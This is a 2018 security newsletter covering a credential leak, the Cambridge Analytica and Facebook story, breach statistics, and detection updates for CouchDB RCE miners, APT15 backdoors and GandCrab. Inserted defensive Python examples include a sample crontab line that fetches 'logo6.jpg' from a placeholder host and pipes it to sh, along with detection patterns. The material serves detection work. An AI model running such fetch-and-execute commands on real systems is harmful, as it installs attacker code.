
J2SECOPS WEEKLY NEWS: Everything from Déjà vu; Facebook and on to numbers of J2 CSC tracked breaches so far for 2018…

Et Tu, Déjà vu?

Data Breach, Hack, Disclose, Repeat. Many late nights and Honest Hot Chocolates poring over the latest blogs posted by the various bloggers I follow, and I found this little gem at Peerlyst by Kim Crawley stating that these 1.5 billion credentials were found via a torrent and not on the darknet as one would expect! Not even behind some secret encrypted firewall hinged between a missing service and a loose vowel. No way! Not even remotely guarded like a teenager’s Snapchat…

My worry is that we are becoming desensitised by the words “breach”, “hack”, “leak” and “exploit”, and that the use of these words has become synonymous with modern cliché and is considered passé.

Jawdropping data breach involves 1.5 BILLION passwords and email addresses | Crawley

Facebook, at the face of it - you get what you pay for…

Now this is an interesting and developing story that I’ve been tracking since Friday the 16th of March: “The Story of Facebook”, which is not actually a “hack”, and deals with between 30 and 50 million Facebook user accounts which have been consumed by Cambridge Analytica for “research purposes”. I suppose the argument is that many of the user account owners “were not aware” until this became public knowledge through the press. Basically, Cambridge created a targeted marketing orchestration engine that used all the data available online, and I’m sure Facebook is not the only source, to offer profiled systems and data to political campaigns.

Welcome to the future, folks! This is the monetization of data-subject analytics using AI and Big Data; it has been happening for ages, and I expect to see users accepting this as common practice as time progresses. Watch this space.

Dark Web and Corporate Records

The so-called cybersecurity experts talk about protecting your assets and how awesome they are at solving your problems, and charge vast amounts of money for you to purchase products and services to protect your business interests, which through your budget cycles never make it to the Premier League and are invariably relegated, not even to the First Division but to the substitution bench of the Second Division… If cybersecurity companies, their products and services were as awesome as they claim, then why so many data breaches and successful exploits?

Here are some statistics for major companies that we have observed year to date, with some home truths.

Just looking at a sample of 15 major domains, e.g. “”, “.net”, “.com” and “”, across the top brands within South Africa, we discovered the following:

  • Of the 15 domains, only 1 has a detected breach within the last 3 days.
  • Of the 15 domains, the highest number of breached corporate records is 17,200, with 17 infected user records.
  • Of the top 4 domains within the 15, roughly 58K corporate records are available, with 43 actively infected user records; this is alarming, as all these domain owners have some level of security in place.
  • Of the 15 domains, the bottom 4 have roughly 25 breached corporate records and no infected user records.

What types of information were found during our sample:

  • Internal and external systems infected with keyloggers that capture logins to servers.
  • Corporate computers infected while being used for personal purposes.
  • Intellectual property that has been stolen and is actively advertised underground.
  • Any compromised credentials (username and password) associated with a domain login.
  • Backdoors on corporate servers used by hackers.
  • Compromised credentials from private as well as public data breaches that were never reported in the press.
  • Cloud login credentials.

New Detection Technique – Apache CouchDB RCE (CVE-2017-12636)

We have observed significant targeting of Apache CouchDB servers recently, exploiting two known vulnerabilities: CVE-2017-12635 and CVE-2017-12636.

These attacks deliver Monero cryptocurrency miners. The vulnerabilities were patched back in November 2017, so keeping the software up to date should be sufficient to prevent these attacks from succeeding.

The vulnerability is used to access CouchDB as the administrator. During the attack, a file (logo6.jpg) is downloaded and then executed as a shell script. The script kills any competing mining activity already running on the machine and downloads the actual cryptomining executable together with a configuration file.

Finally, it configures cron jobs to ensure persistence after the system reboots.

CouchDB is a popular database management system, so attackers still have a wide range of possible targets.

We've updated the 'Client Side Exploit – Known Vulnerability' correlation rule to detect Apache CouchDB RCE activity.
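A defender-side check for the two points above, the patch level of a CouchDB server and the cron persistence the dropped script sets up, added here as an example and not code from this newsletter or from Apache CouchDB. It assumes the version string comes from the server's root endpoint and uses a constructed crontab whose host is a placeholder; the fixed versions are those named in the CouchDB advisories for CVE-2017-12635/12636.

```python
import re

# Versions that carry the November 2017 fixes for CVE-2017-12635/12636,
# per the Apache CouchDB advisories: 1.7.0 for the 1.x line, 2.1.1 for 2.x.
FIXED_VERSIONS = {1: (1, 7, 0), 2: (2, 1, 1)}

def parse_version(version):
    """Turn a CouchDB version string such as '2.1.0' into a comparable tuple."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not match:
        raise ValueError("unrecognised version string: %r" % version)
    return tuple(int(part) for part in match.groups())

def is_patched(version):
    """True if this CouchDB build is at or beyond the fixed release for its line."""
    ver = parse_version(version)
    fixed = FIXED_VERSIONS.get(ver[0])
    if fixed is None:
        return ver[0] > 2          # 3.x and later post-date the fix
    return ver >= fixed

# Persistence pattern described above: a cron entry that fetches a file with an
# image extension over HTTP and pipes it straight into a shell interpreter.
CRON_PATTERN = re.compile(
    r"\b(curl|wget)\b.*\.(jpe?g|png|gif)\b.*\|\s*(ba)?sh\b")

def suspicious_cron_lines(crontab_text):
    """Return the crontab lines matching the download-and-pipe-to-shell pattern."""
    return [line for line in crontab_text.splitlines()
            if CRON_PATTERN.search(line)]

# Constructed sample crontab; the host is a placeholder, not a real indicator.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://PLACEHOLDER-HOST/logo6.jpg | sh
30 2 * * 0 /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for v in ("1.6.1", "2.1.0", "2.1.1"):
        print(v, "patched" if is_patched(v) else "VULNERABLE")
    for line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("suspicious cron entry:", line)
```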

New Detection Technique – APT15 BS2005 RoyalAPT/DNS/CLI

APT15 is a group of well-known attackers that has been active for a number of years now.
Recent reporting has identified new backdoors such as RoyalAPT, RoyalDNS and RoyalCLI.
Using this malware, they recently penetrated a government contractor and stole information about military technology.

RoyalCLI and RoyalAPT appear to be an evolution of APT15's earlier BS2005 malware, and they share C&C domain names with it.
Evidence of compromise was found on the disk drives of the affected machines, where the C&C activity left traces.
During the attack, they also used Mimikatz to dump Windows credentials and generate Kerberos golden tickets to ensure persistence, leaving traces of this activity behind as well.

APT15 also deployed a DNS-based backdoor called RoyalDNS. This maintains persistence through a service called 'Nwsapagent.' C&C is performed using the TXT record of the DNS protocol.

After compromising the initial machines, lateral movement was conducted via a combination of network commands and Windows RCE tools applied inside the LAN.

We've updated the 'Malware infection - Trojan' correlation rule to detect RoyalAPT/DNS/CLI activity.

New Detection Techniques – Trojan Infection

We've added the 'Malware Infection – Trojan' correlation rule to detect recent malicious activity from Arkei Stealer, Grobios, MSIL/Safen, Win32/Configer, and Win32/QQWare.AA families.

New Detection Techniques

Additional correlation rules were added as a result of recent malicious activity.

Updated Detection Technique – GandCrab

GandCrab ransomware has been in the wild since January 2018. Distribution continues via fake Chrome HoeflerText popup windows, spam mails, and the Rig exploit kit.
The attack vector is initiated with a PDF linking to a Word file download, which launches a PowerShell script that later downloads and executes a DLL file.

Campaigns evolved between January and March. Earlier infections deployed the Dridex banking trojan instead of the GandCrab ransomware. GandCrab first appeared as a Windows executable with an .exe extension.

One of the most identifiable characteristics of GandCrab is that it asks for Dash cryptocurrency instead of Bitcoin for the ransom payment.
It also uses Namecoin .bit top-level domains for command and control activity.

We've updated the 'Malware Infection – Ransomware' correlation rule to detect GandCrab activity.
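Both the RoyalDNS TXT-record channel described under APT15 above and GandCrab's .bit command-and-control domains leave their mark in DNS query logs. The detection logic below is added here as an example, not code from this newsletter or from any vendor correlation rule; it runs over a constructed log whose client addresses and domains are placeholders, and its entropy and query-count thresholds are assumptions to tune per environment.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log (timestamp, client, query type, name); not real traffic.
# The C2 and ransomware domains are placeholders, not indicators from the text.
SAMPLE_DNS_LOG = """\
2018-03-20T10:00:01 10.0.0.5 A www.example.com
2018-03-20T10:00:02 10.0.0.7 TXT _dmarc.example.com
2018-03-20T10:00:05 10.0.0.9 TXT 4f9a1c3e7b2d.c2-placeholder.example
2018-03-20T10:00:06 10.0.0.9 TXT 9d2b7e1a0c4f.c2-placeholder.example
2018-03-20T10:00:07 10.0.0.9 TXT a71c3f9e5d02.c2-placeholder.example
2018-03-20T10:00:08 10.0.0.9 TXT 3e8b0d6c2a15.c2-placeholder.example
2018-03-20T10:00:09 10.0.0.9 TXT c50e2a7d9b14.c2-placeholder.example
2018-03-20T10:00:11 10.0.0.12 A ransom-placeholder.bit
"""

def shannon_entropy(text):
    """Bits of entropy per character; encoded C2 payloads score high, words low."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def parse_line(line):
    timestamp, client, qtype, qname = line.split()
    return timestamp, client, qtype, qname.lower().rstrip(".")

def registered_domain(qname):
    # Naive last-two-labels approximation; no public-suffix list handling.
    return ".".join(qname.split(".")[-2:])

def find_txt_beacons(log_text, min_queries=5, min_entropy=3.0):
    """(client, domain) pairs issuing repeated TXT queries whose leftmost label
    looks encoded, the shape of a TXT-record C2 channel such as RoyalDNS."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        _, client, qtype, qname = parse_line(line)
        if qtype != "TXT":
            continue
        if shannon_entropy(qname.split(".")[0]) >= min_entropy:
            counts[(client, registered_domain(qname))] += 1
    return {pair: n for pair, n in counts.items() if n >= min_queries}

def find_bit_lookups(log_text):
    """Names under the Namecoin .bit TLD, which GandCrab used for C2; they have
    no business appearing in ordinary corporate DNS traffic."""
    return sorted({parse_line(l)[3] for l in log_text.splitlines()
                   if parse_line(l)[3].endswith(".bit")})
```

Legitimate TXT lookups such as SPF or DMARC records have low-entropy labels and are not counted, which is why the `_dmarc` line in the sample does not trip the rule.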

Updated Detection Technique – Malware SSL Certificates

We've updated the ‘Malware Infection – Malicious SSL Certificate’ correlation rule to include the list of certificates identified by to be associated with malware or botnet activities.
